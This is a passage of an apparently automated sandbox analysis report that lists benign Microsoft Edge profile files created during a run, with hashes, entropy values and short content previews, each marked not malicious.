                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\97f66652-f0e5-4ab0-a51d-ce24c1379c6a.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):12584
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.209102247326729
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQJ99QTryDiuabatSuypmV7sb9FIa34HkRRb85nbV+FiwQA4nq7NIyPZYJ:stQPGQSu4mpsb9FXwbGxQxq7NI5
                                                                                                                                                                                                                                                                                                                  MD5:BF59E2882EB567E2EFF7978345250018
                                                                                                                                                                                                                                                                                                                  SHA1:58DE1F02F65A480C9C916917D22B0C1C4A81FA42
                                                                                                                                                                                                                                                                                                                  SHA-256:77B1C718622BCB7D6150974124FE11C06633EC6E0D333FEFD8401B3A9DE82416
                                                                                                                                                                                                                                                                                                                  SHA-512:239A634B5EE5A9A1C95C988C63FB45C436D1E78DF6474B2AE3BC76BC49196C18340852BA83B4B9F282AA6004604834506D7639CDFE06B9063FFCA3FA468C4BDF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.245264032511766
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEgQtRsFB1CHhJ23oH+Tcwtp3hBtB2KLlVEgl6UtM+q2PCHhJ23oH+Tcwtp3hBWq:k1sfYebp3dFLscM+vBYebp3eFUv
                                                                                                                                                                                                                                                                                                                  MD5:3C04158EC6BDDE8EB7A4A71603917A18
                                                                                                                                                                                                                                                                                                                  SHA1:BABB63E700FB4314F2BE427E41A5A7114225DAFD
                                                                                                                                                                                                                                                                                                                  SHA-256:8B491213E1DC0AE708D942F9E7D37C9D0B5503F094E90468CD9E72DFFBE56C1E
                                                                                                                                                                                                                                                                                                                  SHA-512:12DC00E6C50F8050118E079DF9D859585EE7928512D3368D9E1AE8674D0AEE72C4C235020941C1680A0DAA83CE43BAB6B2E0196ED5E5767E2BFC37CAA507D1D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.109 148c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/21-09:48:34.401 148c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):1764710
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.13809913149446
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:hKPSfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hKafqJmcx
                                                                                                                                                                                                                                                                                                                  MD5:A954BBC0EBEBF6939D639FDA79026F1F
                                                                                                                                                                                                                                                                                                                  SHA1:E56EB63202564A762CF8F6E441E6DC9854C5D945
                                                                                                                                                                                                                                                                                                                  SHA-256:040DA7B9EED73E20028148E497600D0A9A1936F7C4C6D6C42E5D36F5630E39C8
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AC99AD8C160D88FF032CEB4E9EAF742FD6437C1F17CB4630E0EA47A85ABF14C20CDD8DA9818EE9D76BF96FF43F3B5D3E5E1DFC4F99F3DE27E5AC70EFA7EC1F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.159466128314398
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEg2Nlyq2PCHhJ23oH+Tcwt9Eh1tIFUt8YEg2uj1Zmw+YEgg1RkwOCHhJ23oH+TI:kLbyvBYeb9Eh16FUt8/LuJ/+/b1R56Yf
                                                                                                                                                                                                                                                                                                                  MD5:A6482CFD9A9A18D8028D4DF26715A688
                                                                                                                                                                                                                                                                                                                  SHA1:7E71B7D6ADF4BDF743BCA7B0C11677AD9C1B6C86
                                                                                                                                                                                                                                                                                                                  SHA-256:B984FE30AA42E6F80E783B8D9E18C5BE2132E8E83461D4632A98C222D975E7EF
                                                                                                                                                                                                                                                                                                                  SHA-512:FACBFBCE49507B29CD3783FA8C664A5F15B00AC8EFBB30BE5C1435076A986E9B686B1D5D8C619E0FDBDD8217D321AD91403A4E3622230475421D82C16200FDA1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.305 814 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-09:48:34.306 814 Recovering log #3.2024/11/21-09:48:34.314 814 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.159466128314398
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEg2Nlyq2PCHhJ23oH+Tcwt9Eh1tIFUt8YEg2uj1Zmw+YEgg1RkwOCHhJ23oH+TI:kLbyvBYeb9Eh16FUt8/LuJ/+/b1R56Yf
                                                                                                                                                                                                                                                                                                                  MD5:A6482CFD9A9A18D8028D4DF26715A688
                                                                                                                                                                                                                                                                                                                  SHA1:7E71B7D6ADF4BDF743BCA7B0C11677AD9C1B6C86
                                                                                                                                                                                                                                                                                                                  SHA-256:B984FE30AA42E6F80E783B8D9E18C5BE2132E8E83461D4632A98C222D975E7EF
                                                                                                                                                                                                                                                                                                                  SHA-512:FACBFBCE49507B29CD3783FA8C664A5F15B00AC8EFBB30BE5C1435076A986E9B686B1D5D8C619E0FDBDD8217D321AD91403A4E3622230475421D82C16200FDA1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.305 814 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-09:48:34.306 814 Recovering log #3.2024/11/21-09:48:34.314 814 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46255849841369756
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuk2UtW:TouQq3qh7z3bY2LNW9WMcUvBuk2Ut
                                                                                                                                                                                                                                                                                                                  MD5:984C6E19845497F21064F88C484D3C60
                                                                                                                                                                                                                                                                                                                  SHA1:4B951EA99E7930ECC83BA4FBCD09A71E2CFCB40E
                                                                                                                                                                                                                                                                                                                  SHA-256:F7008CEA5E317501766B916D346D492ADD6AADD7F48DF3F11FCAFB188257AECD
                                                                                                                                                                                                                                                                                                                  SHA-512:4E9DA9570B1EFCA4261FD3724DBFC122A17AEECF4869768A8F175F376FD4F6A613F778EEFF015D29361C0A3740D8CA42AF79CCAEAEE9D22D4B7672B88A3D7B50
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):348
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.213877783561148
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEyGIq2PCHhJ23oH+TcwtnG2tMsIFUt8YEp4XZmw+YEp4FkwOCHhJ23oH+TcwtnB:kyGIvBYebn9GFUt8/p4X/+/p4F56YebB
                                                                                                                                                                                                                                                                                                                  MD5:68F74A1EC952FEFF285BED6FD7651927
                                                                                                                                                                                                                                                                                                                  SHA1:C5968990C27BF220AFA326ECCB8C0485D0B65B23
                                                                                                                                                                                                                                                                                                                  SHA-256:60FAF39C92F2B00352425E8A42D3B7B2C5E61F97EB385ECF05CB361B26D33BEC
                                                                                                                                                                                                                                                                                                                  SHA-512:AE6DF000DF399A17C468B2422975B8DC317F2EF4ED459CD4A13A7AB88C89A71245EAAE9CCD7E35D4960E7BBF9C98FB0B7C9407FD69E70F28AE23015D5778ADEE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.832 1ac4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-09:48:28.833 1ac4 Recovering log #3.2024/11/21-09:48:28.833 1ac4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):348
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.213877783561148
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEyGIq2PCHhJ23oH+TcwtnG2tMsIFUt8YEp4XZmw+YEp4FkwOCHhJ23oH+TcwtnB:kyGIvBYebn9GFUt8/p4X/+/p4F56YebB
                                                                                                                                                                                                                                                                                                                  MD5:68F74A1EC952FEFF285BED6FD7651927
                                                                                                                                                                                                                                                                                                                  SHA1:C5968990C27BF220AFA326ECCB8C0485D0B65B23
                                                                                                                                                                                                                                                                                                                  SHA-256:60FAF39C92F2B00352425E8A42D3B7B2C5E61F97EB385ECF05CB361B26D33BEC
                                                                                                                                                                                                                                                                                                                  SHA-512:AE6DF000DF399A17C468B2422975B8DC317F2EF4ED459CD4A13A7AB88C89A71245EAAE9CCD7E35D4960E7BBF9C98FB0B7C9407FD69E70F28AE23015D5778ADEE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.832 1ac4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-09:48:28.833 1ac4 Recovering log #3.2024/11/21-09:48:28.833 1ac4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6128180873828298
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jdIp/J4mL:TO8D4jJ/6Up+4
                                                                                                                                                                                                                                                                                                                  MD5:AB44AB76320A251885C6D6474A892498
                                                                                                                                                                                                                                                                                                                  SHA1:230BC92419A67FA32FCACF8F5B26D2D6D464495D
                                                                                                                                                                                                                                                                                                                  SHA-256:4087FEC39F09FB62C89630B067685D84B28E6D1E378F3E7572F956863BD6DE3C
                                                                                                                                                                                                                                                                                                                  SHA-512:0186DB43491AF05D80AA33F0331F41113D310E267D263A45CB64E9546292142382C3FBCBCAAD203963DC75D9F8B5C5FBD2847CF926209E473DFC972343AC6E90
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354138497876316
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:IA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:IFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                  MD5:2FC23476801E2BE716E1BB90B5F995A5
                                                                                                                                                                                                                                                                                                                  SHA1:CA5F77E3F878FE65099D08B31B50B400F3FAC0F6
                                                                                                                                                                                                                                                                                                                  SHA-256:8C840BA63C70862606EBA85ADA26470D6596A2464363C0F7E168C80721E46D39
                                                                                                                                                                                                                                                                                                                  SHA-512:38AA3A2C55725A171B0D574298B36BCF9FC036C18F57ED1C6944371645E57AF600A5B8ABAD74A19C0F24513EC22A08DF8919D2F51F3C7F38CC66872DD4352A12
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.F..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13376674117226006..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
